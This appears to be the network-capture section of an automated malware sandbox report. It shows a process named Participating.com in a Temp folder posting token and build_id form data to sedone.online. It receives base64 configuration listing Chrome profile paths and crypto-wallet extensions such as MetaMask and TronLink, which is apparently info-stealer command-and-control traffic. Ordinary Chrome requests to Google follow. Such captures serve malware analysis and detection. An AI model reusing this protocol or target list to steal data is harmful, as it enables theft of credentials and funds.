                                                                                                                                                                                                                                                                Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                4192.168.2.849716116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:49 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----D2NY5P8Q9RQIMYUSJEU3
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:49 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 44 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------D2NY5P8Q9RQIMYUSJEU3Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------D2NY5P8Q9RQIMYUSJEU3Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------D2NY5P8Q9RQIMYUSJEU3Cont
                                                                                                                                                                                                                                                                2024-12-16 12:46:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:49 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:49 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                                Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                5192.168.2.849718116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:51 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ZCTRQ9R1VKF3EU3OZCT0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 332
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:51 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 54 52 51 39 52 31 56 4b 46 33 45 55 33 4f 5a 43 54 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------ZCTRQ9R1VKF3EU3OZCT0Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------ZCTRQ9R1VKF3EU3OZCT0Cont
                                                                                                                                                                                                                                                                2024-12-16 12:46:52 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:51 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:52 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                6192.168.2.849719116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:53 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 6613
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:53 UTC6613OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------JE3OP8YU3EKF3EU3OZ5PCont
                                                                                                                                                                                                                                                                2024-12-16 12:46:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:54 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:54 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                7192.168.2.849720116.203.12.1144438084C:\Users\user\AppData\Local\Temp\615578\Participating.com
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:54 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JE3OP8YU3EKF3EU3OZ5P
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 489
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-12-16 12:46:54 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 33 4f 50 38 59 55 33 45 4b 46 33 45 55 33 4f 5a 35 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------JE3OP8YU3EKF3EU3OZ5PContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------JE3OP8YU3EKF3EU3OZ5PCont
                                                                                                                                                                                                                                                                2024-12-16 12:46:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:55 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-12-16 12:46:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                8192.168.2.849724142.250.181.684432168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:57 UTC603OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                Host: www.google.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIkqHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:46:58 GMT
                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                Expires: -1
                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-sDej1EI5UYhTx01dEHgV3A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                Server: gws
                                                                                                                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                Accept-Ranges: none
                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC124INData Raw: 38 32 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6f 75 6e 64 68 6f 75 6e 64 20 61 69 20 73 74 6f 63 6b 73 22 2c 22 64 61 6c 6c 61 73 20 63 6f 77 62 6f 79 73 20 64 72 61 66 74 20 70 69 63 6b 73 20 32 30 32 35 22 2c 22 62 6c 75 65 20 62 6c 6f 6f 64 73 20 73 65 72 69 65 73 20 66 69 6e 61 6c 65 20 72 65 63 61 70 22 2c 22 74 6f 72 6e 61 64 6f 20 77 61 72 6e 69 6e 67 20 63
                                                                                                                                                                                                                                                                Data Ascii: 826)]}'["",["soundhound ai stocks","dallas cowboys draft picks 2025","blue bloods series finale recap","tornado warning c
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC1390INData Raw: 61 6c 69 66 6f 72 6e 69 61 20 73 63 6f 74 74 73 20 76 61 6c 6c 65 79 22 2c 22 6d 61 72 76 65 6c 20 72 69 76 61 6c 73 20 74 69 65 72 22 2c 22 67 65 6f 72 67 69 61 20 62 75 6c 6c 64 6f 67 73 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 79 65 6c 6c 6f 77 73 74 6f 6e 65 20 73 65 61 73 6f 6e 20 35 20 73 65 61 73 6f 6e 20 66 69 6e 61 6c 65 20 72 65 63 61 70 22 2c 22 72 69 63 6b 20 73 74 65 76 65 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32
                                                                                                                                                                                                                                                                Data Ascii: alifornia scotts valley","marvel rivals tier","georgia bulldogs football","yellowstone season 5 season finale recap","rick steves"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC579INData Raw: 70 64 30 70 45 59 57 63 34 62 30 4a 59 5a 6c 68 45 62 6b 39 6a 56 6c 70 4a 4d 6b 39 76 65 6e 70 42 57 54 5a 4d 55 47 68 55 53 57 4e 4b 64 45 31 6b 64 31 63 72 4d 47 56 4e 59 69 39 6f 56 43 39 47 56 33 52 6f 55 57 4e 4f 4f 46 6c 50 51 56 42 57 4e 54 6c 71 52 47 5a 4a 54 45 74 51 54 69 74 71 64 6a 6c 6e 51 55 39 44 5a 56 45 72 56 45 74 4b 65 6b 4e 6d 52 56 56 70 56 6a 4d 33 51 30 68 43 4e 46 42 57 52 6d 39 77 4b 32 31 6b 62 6c 42 42 5a 33 4a 52 4c 30 64 6d 57 55 4a 69 51 55 68 51 53 30 70 4b 5a 32 49 32 65 45 31 6b 51 55 4e 52 63 6d 4d 78 61 32 5a 52 52 6a 56 7a 63 6a 64 42 5a 32 78 46 64 44 6c 69 52 58 6c 61 51 6b 67 7a 65 46 56 33 5a 32 70 5a 51 57 56 52 65 58 41 7a 55 6a 6b 72 63 48 52 47 53 45 77 31 51 6d 5a 44 65 45 68 32 56 44 42 6b 56 56 56 33 59 58
                                                                                                                                                                                                                                                                Data Ascii: pd0pEYWc4b0JYZlhEbk9jVlpJMk9venpBWTZMUGhUSWNKdE1kd1crMGVNYi9oVC9GV3RoUWNOOFlPQVBWNTlqRGZJTEtQTitqdjlnQU9DZVErVEtKekNmRVVpVjM3Q0hCNFBWRm9wK21kblBBZ3JRL0dmWUJiQUhQS0pKZ2I2eE1kQUNRcmMxa2ZRRjVzcjdBZ2xFdDliRXlaQkgzeFV3Z2pZQWVReXAzUjkrcHRGSEw1QmZDeEh2VDBkVVV3YX
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC90INData Raw: 35 34 0d 0a 63 45 5a 46 64 33 6c 45 65 69 73 35 4d 6b 52 35 61 32 4e 55 61 6d 5a 59 4e 31 68 51 57 6a 67 77 59 6d 4a 6f 54 33 67 76 53 6d 4d 30 55 6b 78 45 64 46 68 4b 64 45 74 6a 4d 48 46 4f 62 44 46 61 4e 7a 64 45 59 6b 6c 52 64 57 39 4c 4d 33 68 6f 65 57 6c 30 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 54cEZFd3lEeis5MkR5a2NUamZYN1hQWjgwYmJoT3gvSmM0UkxEdFhKdEtjMHFObDFaNzdEYklRdW9LM3hoeWl0
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC1390INData Raw: 65 33 35 0d 0a 54 6b 35 43 52 6d 67 32 5a 46 4e 6a 56 6b 78 45 64 45 56 34 5a 69 39 43 4f 55 46 6d 63 32 46 79 59 6b 70 36 5a 6c 4e 72 55 56 68 7a 64 6b 78 68 65 45 6f 79 55 33 45 79 61 58 4a 54 4f 58 55 79 62 48 68 68 65 58 4a 7a 62 48 41 7a 65 57 4a 57 56 7a 56 46 54 47 30 32 57 6a 4e 46 52 33 5a 4a 54 48 56 35 59 58 51 78 57 54 46 34 4d 6c 42 55 56 6b 59 76 59 56 68 79 5a 32 6f 31 55 45 68 58 61 6e 68 5a 57 46 4d 76 52 32 78 6d 52 45 52 49 65 56 46 56 59 32 68 36 4d 55 73 34 5a 47 55 79 61 54 68 5a 61 55 34 30 57 45 31 6a 4f 57 70 4c 4d 31 6f 77 4c 31 42 7a 4e 6d 78 31 4d 6b 74 50 54 6a 4a 59 4f 45 67 78 57 6a 42 52 54 6a 64 72 54 45 30 76 54 45 46 42 51 55 46 42 52 57 78 47 56 47 74 54 64 56 46 74 51 30 4d 36 47 55 64 6c 62 33 4a 6e 61 57 45 67 51 6e
                                                                                                                                                                                                                                                                Data Ascii: e35Tk5CRmg2ZFNjVkxEdEV4Zi9COUFmc2FyYkp6ZlNrUVhzdkxheEoyU3EyaXJTOXUybHhheXJzbHAzeWJWVzVFTG02WjNFR3ZJTHV5YXQxWTF4MlBUVkYvYVhyZ2o1UEhXanhZWFMvR2xmRERIeVFVY2h6MUs4ZGUyaThZaU40WE1jOWpLM1owL1BzNmx1MktPTjJYOEgxWjBRTjdrTE0vTEFBQUFBRWxGVGtTdVFtQ0M6GUdlb3JnaWEgQn
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC1390INData Raw: 32 4e 47 34 32 4c 33 52 7a 56 57 49 31 53 45 4a 4e 5a 30 35 52 62 6c 64 46 4f 58 70 49 4e 31 6c 6e 56 46 5a 79 4d 32 34 32 59 30 52 36 4e 6e 42 4b 56 47 46 5a 65 47 39 31 4e 30 6f 34 5a 57 6c 6f 57 6d 56 74 4d 6d 46 56 59 30 78 56 56 6d 73 32 64 47 34 77 4f 56 70 44 5a 31 4a 6e 55 45 6c 79 64 31 51 32 5a 6d 35 43 62 56 67 78 61 30 5a 56 4c 31 68 4a 55 7a 64 6e 5a 33 4e 49 55 47 49 76 5a 6c 42 45 59 6b 30 72 61 6d 52 44 65 57 74 70 52 46 4e 53 64 31 4a 70 56 58 45 34 64 47 74 35 4e 6c 52 79 53 56 52 31 52 48 46 52 62 54 4e 6d 64 47 70 61 55 7a 46 36 62 32 70 61 4d 6c 46 57 61 46 63 32 56 54 45 33 59 6e 52 33 5a 6b 4e 76 63 57 6c 52 65 6e 70 68 4f 55 39 72 56 33 52 69 53 48 6c 79 61 6b 74 75 5a 45 70 68 59 55 4e 52 55 33 46 36 64 58 41 78 63 47 46 34 55 57
                                                                                                                                                                                                                                                                Data Ascii: 2NG42L3RzVWI1SEJNZ05RbldFOXpIN1lnVFZyM242Y0R6NnBKVGFZeG91N0o4ZWloWmVtMmFVY0xVVms2dG4wOVpDZ1JnUElyd1Q2Zm5CbVgxa0ZVL1hJUzdnZ3NIUGIvZlBEYk0ramRDeWtpRFNSd1JpVXE4dGt5NlRySVR1RHFRbTNmdGpaUzF6b2paMlFWaFc2VTE3YnR3ZkNvcWlRenphOU9rV3RiSHlyaktuZEphYUNRU3F6dXAxcGF4UW
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC864INData Raw: 6d 5a 50 63 56 4a 75 5a 55 6c 75 5a 47 35 49 5a 30 46 4f 65 56 49 7a 4e 47 35 68 57 54 68 56 61 6a 4d 77 59 32 68 30 59 6b 6c 51 59 30 67 31 4f 48 4e 78 56 32 39 34 62 58 4a 5a 65 58 46 71 52 6a 63 30 53 54 64 47 52 6c 56 72 63 6e 64 55 54 45 70 49 65 55 38 32 4c 30 6c 33 4b 33 6b 76 54 57 46 6c 57 6b 4a 4a 57 6b 5a 47 65 48 6c 53 64 6d 6c 49 65 55 68 50 52 33 70 75 4d 6a 4a 58 52 32 35 4e 56 6b 78 42 62 31 5a 58 61 31 42 69 61 31 6b 33 62 6c 6c 6a 56 31 67 78 4e 58 68 56 57 6c 4a 52 59 58 46 58 54 53 39 34 5a 6c 52 35 54 57 46 4f 55 6d 31 71 62 47 74 43 59 6a 42 57 57 46 4a 76 53 6c 6c 4a 56 48 67 35 56 48 4e 74 65 48 46 47 54 57 64 7a 59 6e 4a 35 5a 48 56 53 4e 46 6c 54 57 6a 56 56 63 6b 56 7a 64 46 4a 56 62 58 6c 6e 52 6a 56 45 59 6d 4e 4c 51 6e 59 34
                                                                                                                                                                                                                                                                Data Ascii: mZPcVJuZUluZG5IZ0FOeVIzNG5hWThVajMwY2h0YklQY0g1OHNxV294bXJZeXFqRjc0STdGRlVrcndUTEpIeU82L0l3K3kvTWFlWkJJWkZGeHlSdmlIeUhPR3puMjJXR25NVkxBb1ZXa1Bia1k3blljV1gxNXhVWlJRYXFXTS94ZlR5TWFOUm1qbGtCYjBWWFJvSllJVHg5VHNteHFGTWdzYnJ5ZHVSNFlTWjVVckVzdFJVbXlnRjVEYmNLQnY4
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                9192.168.2.849727142.250.181.684432168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-16 12:46:58 UTC506OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
